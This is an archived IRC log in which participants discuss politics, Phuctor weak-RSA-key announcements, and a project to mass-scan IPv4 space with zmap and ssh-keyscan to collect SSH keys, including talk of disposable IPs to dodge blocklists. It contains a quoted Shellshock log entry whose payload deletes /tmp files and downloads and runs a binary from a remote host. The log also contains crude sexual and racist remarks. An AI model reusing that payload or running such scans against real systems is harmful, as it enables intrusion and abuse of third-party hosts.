Hide Idle (>14 d.) Chans


← 2016-05-20 | 2016-05-22 →
mircea_popescu: sure, sure. and why do i need to know how the gcc trick works.
deedbot: [» Contravex: A blog by Pete Dushenski] Ben Hur - http://www.contravex.com/2016/05/21/ben-hur/
deedbot: [Qntra] Ivanpah Solar Plant Sets Self On Fire - http://qntra.net/2016/05/ivanpah-solar-plant-sets-self-on-fire/
Framedragger: mircea_popescu: (got 2768 ssh-rsa keys on a test run on a populated /16... this will be fun.)
mircea_popescu: ahahaha BingoBoingo
mircea_popescu: Framedragger how long did covering the /16 take ?
Framedragger: mircea_popescu: with timeout per host set to 5sec (default) and unaltered parallel scanning setting (ssh-keyscan does parallel stuff pretty well but it may not be best for scanning huge numbers of hosts; case in point: default version for ubuntu 14.04 terminates if a single remote host closes conn prematurely - needed to patch this..), it took ~65 minutes (i've started logging timestamps afterwards but this is prob quite accurate). this
Framedragger: this was using single machine only - scanning with two now, will add third one when i have a few min. but yeah it's overall slow i guess you could say
Framedragger: (irc msg maxlen is 512 chars right?)
mircea_popescu: ahahahaha nice. gord frw.
mircea_popescu: ;;calc 2 ** 16 * 65 / 60 / 24 / 365
gribble: 8.10471841705
mircea_popescu: 8 years on a single machine. what were you running, aws ?
Framedragger: i'm considering running zmap on high-throughput server to quickly get all internet-connected machines in ipv4 space, and then feeding that into ssh-keyscan. may be more efficient. also need to get some disposable ip addresses or something, cause according to internet my coupla server IPs will soon be added to some shitlist
mircea_popescu: eh i got 100s.
Framedragger: no just a server with probably 50 mbps good uplink
asciilifeform: that there's the general minus of scanning
Framedragger: yeah i may set up some aws nodes
asciilifeform: the ip becomes ~useless for any other use
mircea_popescu: please do a different /16 on an aws just to get a handle on how much it costs.
Framedragger: k i'll try and do that (a bit later)
mircea_popescu: asciilifeform you know i don't understand, wtf aren't they making pastries this way! at first i thought that's dough on her tits for sure... but no, just paint ?
asciilifeform: that was my first thought !
mircea_popescu: wtf what a waste. titpressed titcakes! wants!
Framedragger remembers he has a disposable tor exit node on digitalocean, can use that one
mircea_popescu: Framedragger tor is uselessly slow
Framedragger: nono, i just mean, i can just use that particular machine for dirty work, cause i can't use that ip for other purposes anyway, it's tainted
Framedragger: but yeah need to think of bigger scales here.. short-term aws/azure farms, whatnot
mircea_popescu: just to eval it. in general the zmap idea is right and proper.
Framedragger: "With [... some custom] changes, ZMap can comprehensively scan for a single TCP port across the entire public IPv4 address space [on a 10Gbps pipe, looks like] in 4.5 minutes given adequate upstream bandwidth." https://www.usenix.org/system/files/conference/woot14/woot14-adrian.pdf - not bad
mircea_popescu: aha. it's rapid yeah
mircea_popescu: the only problem is, i'd expect you will receive ~1/3 of the address space as hits.
mircea_popescu: billionish machines.
Framedragger: something something avoids having to take care of timeouts (is stateless) by putting custom info in packets / "SYN cookies" something
Framedragger: mewonders
mircea_popescu: check it out asciilifeform , there's not even as many computers as there are people and they're already beating us in go :D
Framedragger: someone published survey results
mircea_popescu: oppressed fucking minority.
Framedragger: shitloads of webcams, "secure" printers etc (of course)
mircea_popescu: dun matter does it
asciilifeform: Framedragger: this is in the old logz
Framedragger: oh. figures...
Framedragger: man i need some tool which autosearches from logs while i type in irc
mircea_popescu: write it!
mircea_popescu: not a bad idea either, as a plugin.
asciilifeform: a working $s would be almost as good
mircea_popescu: they're workin' on it.
Framedragger: wonder if whole log would become references to itself, il n'y a pas de hors-texte and all that
Framedragger: hm true...
mircea_popescu: Framedragger pretty much there already.
mircea_popescu: it's just that the majority of computer folk are uncouth and didn't read their linguistics and semiology.
mircea_popescu: which is shameful, really, seeing how ITS THE OTHER FUCKING COMPILER.
mircea_popescu: pretending to have a cs program that's all linguistics-free seems to me the height of ignoramity, but whatevs.
Framedragger: yeah i can't hold interesting convos with these cs people for long sometimes, it's like, fuck you humanity you suck
Framedragger: no but for real. thing is, cs folk usually haven't even read their own "definitive" texts (shannon, e.g.)
mircea_popescu: yes, alf bitching about this is in the logs :)
asciilifeform: in what universe does it make sense to regard the imbeciles as 'cs folks' ?
mircea_popescu: asciilifeform hey, they got a cert.
Framedragger: well i did use "folks" which isn't a word from the most high register so to speak :)
Framedragger: butyeah
asciilifeform: what next, 14th c let's-treat-the-wound-with-shit idiot is 'doctor' ?
Framedragger: 'the fucking witch deserved it'
mircea_popescu: part of the history of medicine, like it or not, mr progress.
asciilifeform: sure but if he lives today ?
mircea_popescu: but there is no yesterday of computing!
mircea_popescu: it all happened in a blink of a slow blinking eye!
asciilifeform: there was a pretty sharp transition from, e.g., mccarthy to jwz
Framedragger: you're still using $framework? GO BACK TO YER CAVE
mircea_popescu: slow blinking eye!
asciilifeform: more of a puckering sphincter
mircea_popescu: lmao omfg. dude published the 2012 census with a pgp (v2.0!) 1kb rsa key ; and he claims to be inspired by... XKCD!!! to do a fucking hilbert curve. omfg the unit-square covering discussions were all in vain, xkcd is the source.
Framedragger: didyouknow, someone wrote a graphing library which mimicks xkcd graph style. iirc it's actually quite nice, insofar as hipster things can be nice. shitlikethat...
Framedragger: yeah seen it, heh
mircea_popescu: ah ? well then.
Framedragger: by all means, keep reinforcing the "nothing outside the text" notion ! but yeah, good to revisit
Framedragger: [dodges the "that's not the proper translation" discussion]
mircea_popescu: per the drunken walk model, once you're hitting sqrt(1) of references in cache you've read enough :D
Framedragger: hehehe
asciilifeform doesn't get it
mircea_popescu: psychotic face contortions
asciilifeform: in other nyooz,
asciilifeform: 198.55.114.155 - - [21/May/2016:16:49:40 +0000] "GET / HTTP/1.1" 200 1101 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/
asciilifeform: bash -c \x22rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo /tmp/China.Z-jkfz\xA8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
mircea_popescu: da fuck is this
asciilifeform: pretty obvious, neh ?
asciilifeform: the real mega-question is ~where~ this worx
mircea_popescu: no ? someone trying to pipe bash through apache ?
mircea_popescu: check it out, it's like 1990 in china.
asciilifeform: the lulzy bit is that the thing hosting the dropper is dead.
mircea_popescu: are youy calling it with wget ?
mircea_popescu: well, maybe it detects.
asciilifeform: wget same.
mircea_popescu: who the fuck uses wget instead of curl anyway, you know ?
asciilifeform: box is stone dead.
mircea_popescu: "here's the archive tool and here's the single url tool, i know, i'll use them backwards!"
mircea_popescu: for that matter, why's he not using pastebin or w/e.
mircea_popescu: "safeauto's do the jingle makes insurance advertising fun" ?
asciilifeform: i have nfi
Framedragger: mircea_popescu: to get list of machines listening on port 22 using zmap on amazon aws micro instance with 100 mbps pipe, it takes approx 9-10 minutes per /16. note, only what's listening on port 22, but ssh-keyscan should then plough through pretty quickly. will later run more tests, i'll leave a single instance to scan some /16s to then feed into ssh-keyscan
mircea_popescu: yeah but what's the bill
Framedragger: i mean, i'm using some sort of free tier now, lols. should be cheap..
mircea_popescu: ah cool then
Framedragger: i'll let you know once some data is gathered
mircea_popescu: that's what needed testing.
Framedragger: they'll start charging for bandwidth sooner or later
Framedragger: i understand
Framedragger: gon take some time to even start incurring cost tho
mircea_popescu: eh, nmap takes 50bytes/try or such
mircea_popescu: anyway, so if you spun up 1k aws micros the whole thing could be done in ~a day.
Framedragger: (ah it seems zmap's saturated the 100mbps pipe quite efficiently. yeah will let you know re. cost, prob sooner than expected heh)
Framedragger: fo sho
mircea_popescu: asciilifeform ^ see ? leverage increase. do this in 1996.
asciilifeform: if anything, it was ~more~ doable in '96, nobody ipbanned
asciilifeform: nor did the folks you got the t1 from give half a fuck what you did with it
mircea_popescu: gawd you're hard.
mircea_popescu: this is like "it was way easier to do astronomy in 2016 bc, not nearly as much atmospheric pollution" "nor did anyone have any glass" "fu, i had glass!"
asciilifeform: moar like 1880.
mircea_popescu: re-reading durkeim it becomes obvious that a) omfg socialists everywhere, what the FUCK is it with this "we're all one" pov already! and b) being an anarchist is ~= being a bleating idiot ; what a man's supposed to be is an anomist.
asciilifeform: diff anarchist anomist ?
mircea_popescu: anarchist === socialist, with the added flavouring of putting the rejection of hierarchy socially above economically, politically or otherwise.
asciilifeform: on what planet ?
asciilifeform: how does one 'socialist' without statism
mircea_popescu: (the "peace movement"/"modern democracy" flavour puts the political one first, and is the more fashionable today. communism puts the economical first, as per ziggler & co. used to be most fashionable)
mircea_popescu: whereas anomist = one who rejects the regulatory role of society.
mircea_popescu: asciilifeform anarchists are not against statism per se.
asciilifeform: mircea_popescu must've read a very different set of anarchists than asciilifeform
mircea_popescu: they're against the "repressive" ie, educational state. but otherwise, the state must be there for anarchy to exist.
mircea_popescu: asciilifeform or maybe mircea_popescu reads beyond what people like to pretend they're saying into what they're actually saying!
asciilifeform: show me where 'the state must exist' in, e.g., kropotkin
mircea_popescu: any portion in particulare ?
asciilifeform: anywhere !
mircea_popescu: what promotes the "voluntary cooperation" ?
mircea_popescu: suppose i dun wanna cooperate. what now ?
asciilifeform: live with wolf ?
mircea_popescu: kropotkin's necessary state is imported as this cvasi-mystical "all men must x y z and will so!"
mircea_popescu: "and if they don't ?" "uh."
asciilifeform: if they don't, they fight - where's the enigma here
mircea_popescu: well im no kropotkin specialist myself, but i'm unaware of him putting war as a legitimate human endeavour.
mircea_popescu: anyway, in the general - whenever ideologue makes presuposition as to what humans are, or do, or will be or will do, he's therefore and by that an etatist.
asciilifeform: i dun think war cared if anybody wrote it down as 'legitimate endeavour' or not
mircea_popescu: but we're discussing kropotkin the anarchist, not war the phenomenon.
mircea_popescu: unless your fellow said himself "and if they don't, they fight and whoever wins was right", he's what i say not what you say.
asciilifeform: not wholly unrelated though. being the reason we haven't any serious anarchic communes to kick around no moar, is that they're no good at war.
mircea_popescu: no, it's because they need a very specific sort of mommy that's yet in short supply.
mircea_popescu: there'd be no end and no shortage of anarchistic-flavoured socialism everwhere if "society collapsed" and there were 1mn people left and 2mn walmart warehouses stacked.
asciilifeform: is this isomorphic to the swedish fishermen thing ?
mircea_popescu: ie, they need a sort of state like the wasp's parents. dead corpse to be eaten. still etatist though.
mircea_popescu: just, a different kind of state.
asciilifeform: how 'anarchic' was their flavour
mircea_popescu: it could well be, yeah. quite, neh ?
asciilifeform: not so much - their villages were miniature totalitarian monstrosities in themselves
mircea_popescu: of course. socialism is socialism is socialism.
mircea_popescu: turd flavourer how it may be flavoured is turd by mass.
mircea_popescu: anyway, the trick of pretending one's own flavour of state is "merely human nature" is, i suppose, pretty effectual. also quite old, karl ziggler / friedrich carnegey did it too!
mircea_popescu: might have been zigg marx/dale engels, i always get obscure american self-help / weight loss / aluminum siding & friendmaking authors mixed up.
mircea_popescu: asciilifeform the trick, generally, of passing one for another is visible throughout the nigger career, whichever nigger one might pick. so kropotkin studied cooperation in nature ; which is fine, and observed that it plays a role, which is true. fuck, tmsr is pretty heavy on cooperation also. aaaaaaand then... the sleigh of hand. really, there should be no preferential distribution ? what the shit. and of course, the pious f
mircea_popescu: raud throughout - really, unsociable species are doomed to decay ? if only we decayed as much as the scorpions did in their lengthy existence. they've stayed viable apex predators in their niche for longer than humans likely will.
Framedragger: approx 4.2 GB of bandwidth used for 14.6k sshd-running IPs, hit rate ~= 0.02% (these are rather random, not guaranteed-to-be-used (only definitely not in reserved blocks) subnets it's possible zmap just doesn't flush to file that often at all - will check later wtf's happening). $0.155 per GB of bandwidth (first 15 GB free). running for 72 min
mircea_popescu: ;;calc 2**32 / 14600 * 0.0002 * 4.2 * 0.155
gribble: 38.3016946534
mircea_popescu: so forty bucks gets the internet, more or less.
Framedragger: when i was walking outside thinking of $ i got a similar figure in mind - lower bound maybe $30 and upper maybe $70, but prob $/GB rate was off in my mind
Framedragger: so yeah
mircea_popescu: alrightey
Framedragger will one day attempt to participate in such discussion, anomism, hmm...
Framedragger: (that zmap paper matches this estimate btw - 4.5min was it - 10gbps pipe - lessay 1GiB/s for 270sec => 270GiB; vs 2^32 / 14600 * 0.0002 * 4.2 = 247GiB)
mircea_popescu: great cat lol
mircea_popescu: ima bbl.
trinque: asciilifeform │ if they don't, they fight - where's the enigma here << and then they fight, and someone wins, and someone's dominant, and whoops what happened to anarchy
trinque: that cat is wondering when you're going to stop tapping oddly on that desk and catch a damn bird
trinque: bet he's even brought you half-dead ones trying to teach!
trinque: Framedragger: if you get tired of aws, there's this cheap-as-shit DC called Joe's Datacenter I've been using
trinque: unlimited bandwidth can be had for $notmuch
trinque: homeboy over there has even hooked me up with free KVM access as a favor
asciilifeform: trinque: cat is wild.
jurov: how the saying goes... early cat gets the bird
asciilifeform: in other not-quite-nyooz, http://baesystemsai.blogspot.com/2016/04/two-bytes-to-951m.html << some dissection of the swift trojan, as seen in the old thread, http://btcbase.org/log/2016-03-12#1430996
a111: Logged on 2016-03-12 00:40 mircea_popescu: (actually, amusingly enough, swift docs date from just about the era ada was fashionable. there was such a time - just like that time in the 90s when everyone was eager to implement linux-y things and you didn't really have to sell it at all, whole cities just switched for no reason)
shinohai: Almost there, @StartJOIN pitch almost ready, an Open Source PGP digital Key signing tool that we're after funding to add new features"
asciilifeform: 'PGP digital Key signing tool' ??
asciilifeform: i can almost hear the indian accent
shinohai: lolz
shinohai: The advent of paywalled applications, where new features can only be added with crowdfunded blockchainz
mircea_popescu: asciilifeform speaking of anarchists, it occurs to me the comic you linked a while back is a fine example. the girl in there is an out and out anarchist. she requires, for her anarchism, the cartoonist to draw the nonsense she lives in ; or if out of meta, for someone to create all the items she uses and then stay out of her way.
mircea_popescu: by and large, anarchism is this aspiration to absentee parents.
asciilifeform: wai which
mircea_popescu: some murderer for hire something
asciilifeform: ah, 'captain estar'
mircea_popescu: living in a thoroughly alienated world where hit targets were SO ALONE they actually were you know, a sort of crumb.
asciilifeform: but ~all cartoon characters can only live in the paper
asciilifeform: sorta what makes it what it is, neh?
mircea_popescu: yes, but some are more like superman, ie, roosevelt socialist ; and some others more like national socialist.
mircea_popescu: this is anarchist-socialist.
asciilifeform: here is the question that itches me:
asciilifeform: how cheap the energy before it is 'socialist herring' ?
a111: Logged on 2016-05-21 18:14 mircea_popescu: there'd be no end and no shortage of anarchistic-flavoured socialism everwhere if "society collapsed" and there were 1mn people left and 2mn walmart warehouses stacked.
mircea_popescu: i dun think it is a matter of energy.
asciilifeform: how does '1m people, 2m collapsed wallmarts' differ from 'put shit in the ground and let the sun do the work' ?
asciilifeform: or 'throw rock at deer and eat phreeee meat'
mircea_popescu: see, here's the catch : the value of walmart today.
asciilifeform: seems like a difference of degree
asciilifeform: rather than kind
mircea_popescu: after a generation of that, the value of walmart would equalize and we'd have a rehash of actual society.
mircea_popescu: socialism is the equivalent of grain : may only exist after cataclysm.
asciilifeform: equalize as in, spent ?
mircea_popescu: as in "no longer socially meaningful"
mircea_popescu: like jeans in russia. who's gonna suck your cock for a pair now?
asciilifeform: so - spent
mircea_popescu: in that sense, yes. not physically spent, but psychologically spent
asciilifeform: so mircea_popescu is of ye olde 'banana makes africans stupid' school ?
asciilifeform: as in, 'too cheap to meter' (tm) (r) morally corroding.
mircea_popescu: note that the higher energy output of rice vs wheat has created ... larger azn cities. that's all.
mircea_popescu: population grows, technology does not.
asciilifeform: iirc we actually have pretty good records of cn ~prior to rice~
asciilifeform: but i have nfi what is in them.
mircea_popescu: so to come full circle : the items of interest in (the otherwise very on point) question "how cheap energy before it is scania herring" are cheap and herring ; not energy - that is always as cheaper as it always is, slightly more expensive as newton's death approaches.
mircea_popescu: the social notion of cheapness and the individual notion of herring however fluctuate.
asciilifeform: elaborate plox ?
asciilifeform: the perennial favourite example (as seen in, e.g., orlov, and elsewhere) is bacteria in agar
mircea_popescu: the tsar impedance mismatch created communism, ie, eco-first socialism ; the ww1 shock created national-socialism, ie, "we're all equal except for those schmucks" - and perhaps noteworthy here that the nazis couldn't quite decide if they're enumerating badness or goodness or what. but the idea was, "socialism within the bubble"
asciilifeform: and 'humans are every bit as stupid as bacteria"
mircea_popescu: and the moore law (pars pro toto, it's really starting with steel) catastrophe created the roosevelt socialism, aka "modern democracy" / "human rights" / "peace movement" etc.
mircea_popescu: but outside of catastrophe, socialism fares as well as wheat. birch forest is the stable solution, not fucking wheat field.
asciilifeform: birch is terrible example
asciilifeform: it is the closest thing to wheat among trees
mircea_popescu: which is why the state-volcano, or state-plow or state-something is always needed
asciilifeform: hence why ru is full of'em
mircea_popescu: beech not birch. wtf is it called.
mircea_popescu off to review botanics now
asciilifeform: where the villages burned - there are now birches.
asciilifeform: (in western eu - poppies)
asciilifeform: this is a fairly broad category
mircea_popescu: fagus. beech.
mircea_popescu: varies with the zone, but anyway.
asciilifeform: thing about nature is that nobody promised anyone a single equilibrium point
asciilifeform: beech can stand for 1,001 years, or burn overnight.
asciilifeform: if gets lucky.
mircea_popescu: BingoBoingo http://dpaste.com/1ZY126A dunno if worth your time, but anyway.
mircea_popescu: fucking derps using my first name. to quote, "have we fucked ?"
mircea_popescu: asciilifeform and once it burns, blueberry move in, then birch, then beech again.
mircea_popescu: birch seed can not grow under the shade of adult birch trees. beech seed can. that's all the difference.
mircea_popescu: socialist spawn can't fucking live in socialist world, c'est tout.
asciilifeform: mircea_popescu: https://geektimes.ru/post/269914 << re where 'elbrus' went.
asciilifeform: most pertinently, 'Получается в лучших традициях Советского Союза: машина есть, цена есть, купить нельзя.'
asciilifeform: https://geektimes.ru/post/270382 << someone actually dug up, reviewed
mircea_popescu: well... maybe in time.
asciilifeform: megatonnes of old-school 'seals', 'tamper' whatevrthefucks
asciilifeform: ;;later tell mircea_popescu growing 8ball installed. it will take several days for it to exceed the size of the old 8ball tho. however, it auto-saves and resumes in case of reboot, etc.
gribble: The operation succeeded.
BingoBoingo: <mircea_popescu> BingoBoingo http://dpaste.com/1ZY126A dunno if worth your time, but anyway. << If they wanna write the steps are available. Dun see the point of the kink exchange
shinohai: ;;isup sdf.org
gribble: sdf.org is down
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Lukas D. Jacobs <ich@lukasjacobs.de>; Lukas D. Jacobs <pirat@lukasjacobs.de>; Lukas David Jacobs <ich@lukasjacobs.de>; Lukas David Jacobs <pirat@lukasjacobs.de>; ' - http://phuctor.nosuchlabs.com/gpgkey/65E4BA4A1435AACB51DC0C86175C626CFA97D3E9E4299439764DEE43C97FD18D
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Apple Product Security <product-security@apple.com>; ' - http://phuctor.nosuchlabs.com/gpgkey/01242DCED832B429633FEE0CE9B056C695BBF80CA513619A2CA3AA895AC4735F
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Piraten | Martin Letzel <piratenpartei@letzel.org>; ' - http://phuctor.nosuchlabs.com/gpgkey/1CCC37C88F16286BE08BD15EF9EBAD67F10A9165B5CED6989EEE64FA7C644356
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Robert L. Vaessen (MobileMe key generated with gpg) <rvaessen@me.com>; ' - http://phuctor.nosuchlabs.com/gpgkey/F7ED43E91BC7980A082F3EF866B2FB785952BDCB758707BCB2E0F3EBEE519145
Framedragger: "<product-security@apple.com>" hah!!
Framedragger: seems that their current key is different fwiw: https://www.apple.com/support/security/pgp/ ?
Framedragger: http://btcbase.org/log/2016-05-21#1470259 << that's nice, thanks trinque - are they able to provide near-100mbps for their cheapo VPSs?
a111: Logged on 2016-05-21 18:53 trinque: Framedragger: if you get tired of aws, there's this cheap-as-shit DC called Joe's Datacenter I've been using
deedbot: [Recent Phuctorings.] Phuctored: 3 divides RSA Moduli belonging to 'FAKE: key generation test; ' - http://phuctor.nosuchlabs.com/gpgkey/0A8E8A26D309CBC4A73BD31E3D6C6AE49AB443FA58E2A9A823BAA868189AB6A5
Framedragger: ^ re. product-security@apple.com's key, or is that some broken sub-key of the master key, or somesuch? (broken 'cause of the "Modulus has mirrored low-order 32 bits !", for whatever original cause/reason)
asciilifeform: ;;later tell mircea_popescu perhaps we should only print update here when a previously-unphuctored modulus pops? who even cares when old turds break into finer rubble..?
gribble: The operation succeeded.
asciilifeform: http://btcbase.org/log/2016-05-22#1470355 << there was a set of entirely phony keys, built via a certain algo, by an unknown 3rd party long ago. see logz.
a111: Logged on 2016-05-22 00:37 Framedragger: ^ re. product-security@apple.com's key, or is that some broken sub-key of the master key, or somesuch? (broken 'cause of the "Modulus has mirrored low-order 32 bits !", for whatever original cause/reason)
Framedragger: ah ok thanks for the explanation! more logs.... :)
Framedragger: $s test
Framedragger: oh it doesn't do that
asciilifeform: ;;later tell phf your search box is not grep-compatible. srlsy for fucks sake i can't search for '3 divides' without getting a pile of rubbish
gribble: The operation succeeded.
asciilifeform: 'here is a meg of lines with '3' and 'divides' in'em' is WORTHLESS
asciilifeform: what works this way and where???!
asciilifeform: other than shitoogle
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Christian Busch <chris@debilux.org>; Christian Busch (Jabber) <chris@im.debilux.org>; ' - http://phuctor.nosuchlabs.com/gpgkey/07FA12843E0B7B875AA7899C3556B1B21140858AF13AB151E34860070003997E
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Stephen Domorod III (Stephen at Domorod dot Org) <stephen@domorod.org>; ' - http://phuctor.nosuchlabs.com/gpgkey/CD894142C4313393598D2A7B35E2A61D9CD4C6ACC0214D508203C9CDA8A65195
Framedragger: ..hrm. zmap finished scanning sixteen /8's (so a sixteenth of ipv4 space, minus reserved blocks), but in those blocks there were two known servers running openssh which was picked up by ssh-keyscan. they weren't picked up by zmap. if the thing is unreliable then it's worthless (it still found > 95k of ssh servers though, but...)
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Martin M. Stoppler <martin@stoppler.de>; ' - http://phuctor.nosuchlabs.com/gpgkey/41C3308E5F375899710919E1484F78A1DC042B81EDDC432F38F75D4BDA9B29FC
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Charly Avital(RSA4096) <shavital@mac.com>; Charly Avital (RSA-AES256) <shavital@netbox.com>; ' - http://phuctor.nosuchlabs.com/gpgkey/29D4AB4C1D200C86FB06AB27CA9C38448622E11D3107C3A23E06C538C85B2CD0
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Luciano Buszmicz (Never forget: 2 + 2 = 5 for extremely large values of 2.) <lbuszmicz@zimbra.itx.net>; ' - http://phuctor.nosuchlabs.com/gpgkey/1C37B216D569982CD4D18802D703548E1A352C5E3C3F6057CEC02FFAFF9C8ABD
BingoBoingo: ;;bc,stats
gribble: Current Blocks: 412804 | Current Difficulty: 1.9425482028344403E11 | Next Difficulty At Block: 413279 | Next Difficulty In: 475 blocks | Next Difficulty In About: 3 days, 5 hours, 33 minutes, and 3 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None
mircea_popescu: asciilifeform lovely!
a111: Logged on 2016-05-22 00:31 Framedragger: "<product-security@apple.com>" hah!!
mircea_popescu: http://btcbase.org/log/2016-05-22#1470357 << on one hand, i care ; on the other hand - there's not that much traffic from phuctor to warrant looking for ways to lower it.
a111: Logged on 2016-05-22 00:46 asciilifeform: ;;later tell mircea_popescu perhaps we should only print update here when a previously-unphuctored modulus pops? who even cares when old turds break into finer rubble..?
mircea_popescu: http://btcbase.org/log/2016-05-22#1470366 << no it's not worthless omaigerd. that's how i search for things. you want to search for the string use "
a111: Logged on 2016-05-22 00:53 asciilifeform: 'here is a meg of lines with '3' and 'divides' in'em' is WORTHLESS
mircea_popescu: and whai do you ambush lords for your failure to use the things properly!
a111: Logged on 2016-05-22 01:20 Framedragger: ..hrm. zmap finished scanning sixteen /8's (so a sixteenth of ipv4 space, minus reserved blocks), but in those blocks there were two known servers running openssh which was picked up by ssh-keyscan. they weren't picked up by zmap. if the thing is unreliable then it's worthless (it still found > 95k of ssh servers though, but...)
Framedragger: i'm now running the reliable but slower ssh-keyscan on the 95k ssh-running IPs just to get a decent sample. will later revisit wtf zmap is doing
mircea_popescu: open source stack o' shit for the love o' christ.
Framedragger: hum, no girl ever sucking licking my well-shaven balls :/
mircea_popescu: how many did you ask ?
Framedragger: *ever liked
Framedragger: uh, < 15 for sure, so yeah
mircea_popescu: zmap plox.
Framedragger halts sad memory recollection
mircea_popescu: in other news, there's just enough ipv4 to address every chick out there.
Framedragger: so what you're saying is there's no ip exhaustion crisis at all!
mircea_popescu: only for gay ppl.
Framedragger: something something "gay ppl have to use [udp] holepunching (to get through NATs)"
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Vincent Thenhart <email_vincent@web.de>; Vincent Thenhart <vincent.thenhart@piraten-rlp.de>; ' - http://phuctor.nosuchlabs.com/gpgkey/3AA58F9BF28C0A4F3A8450E3194CC86A946D9B6A49E362AFCFFA950F72894DBB
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Carl Christoph Leimbrock <christoph.leimbrock@gmx.de>; ' - http://phuctor.nosuchlabs.com/gpgkey/41CE4AD52DCCD849DEFF2F8EF2F59A5563DEF92184DA02E60743A44F38C9BDE4
deedbot: [Recent Phuctorings.] Phuctored: 4294967297 divides RSA Moduli belonging to 'Thomas Weitzel <tweitzel@synformation.com>; ' - http://phuctor.nosuchlabs.com/gpgkey/9B870E23ED01741E0A587BEFDC1F1988A18C079AFE2F2DA62392548B9A36A4F8
Framedragger: mircea_popescu: asciilifeform: in regards to ssh key spidering, it's best then to produce output in the form of e,N,comment - is that right? (where comment in this case would be the ip addr)
asciilifeform: Framedragger: yes, because this is easiest to convert later to whatever form
asciilifeform: http://btcbase.org/log/2016-05-22#1470382 << srsly, you don't care that '3' is found in some 234323454329489858734587372586775363478 ?
a111: Logged on 2016-05-22 02:00 mircea_popescu: http://btcbase.org/log/2016-05-22#1470366 << no it's not worthless omaigerd. that's how i search for things. you want to search for the string use "
asciilifeform: whole-word boundaries at the very least, is sane.
Framedragger: asciilifeform: k. fwiw conversion from openssh PEM'd format to e,N,ip is easy enough: http://wotpaste.cascadianhacker.com/pastes/65ffd4c7-1a6c-4015-9a24-3e63f90eaacc/
Framedragger: so that part's covered.
asciilifeform: the unfortunate bit is that i am not quite yet equipped to do anything with this.
Framedragger: i guess i'll give the results in that format for those 95k ssh hosts (actual number of keys will be lower, i can see that some of those hosts are providing clients a nil set of encryption mechanisms, etc etc
Framedragger: no worries - actual scanning progress will apparently be slow anyway..
asciilifeform: http://btcbase.org/log/2016-05-22#1470380 << it is bothering me greatly that i have nfi why any 4294967297's remained to be nailed
a111: Logged on 2016-05-22 01:57 mircea_popescu: http://btcbase.org/log/2016-05-22#1470357 << on one hand, i care ; on the other hand - there's not that much traffic from phuctor to warrant looking for ways to lower it.
asciilifeform: considering that we had a 10mil*p 8ball in play prior to today
asciilifeform: ( for anyone who forgot, 4294967297 == 2^32 + 1 )
mircea_popescu: asciilifeform well, if it gets to be too much we might start caring. in principle it should NEVEr be found mind
asciilifeform: i want to know where the hell it was before...
mircea_popescu: Framedragger a sample sorta thing works to have what to get things going with ; but in general, just do and deliver the whole bunch
asciilifeform: btw, what's deedbot's polling interval ?
asciilifeform: i think it missed some
mircea_popescu: hour iirc ?
mircea_popescu: anyway, re the mysterious reappearing 4bn : this is kinda why it's best to err on the side of verbosity a little. if it gets tedious we can cut it back later.
mircea_popescu: you should see eulora server logs, 100+mb/day
mircea_popescu: Framedragger iirc ssh pubkeys also include an email do they not ?
mircea_popescu: in any case for ssh collection ip should be prepended to whatever comment's available.
mircea_popescu: http://phuctor.nosuchlabs.com/stats << "moduli broken : 228", up 10% from last month :p
mircea_popescu: asciilifeform how about we add a credits page, move bernstein there, also add phf for keybase spidering, jurov for github spidering, others as may be ? also theory prolly should be rewritten
asciilifeform: yeah right now it is all in the very threadbare theory pg
mircea_popescu: lemme write a coupla drafts.
← 2016-05-20 | 2016-05-22 →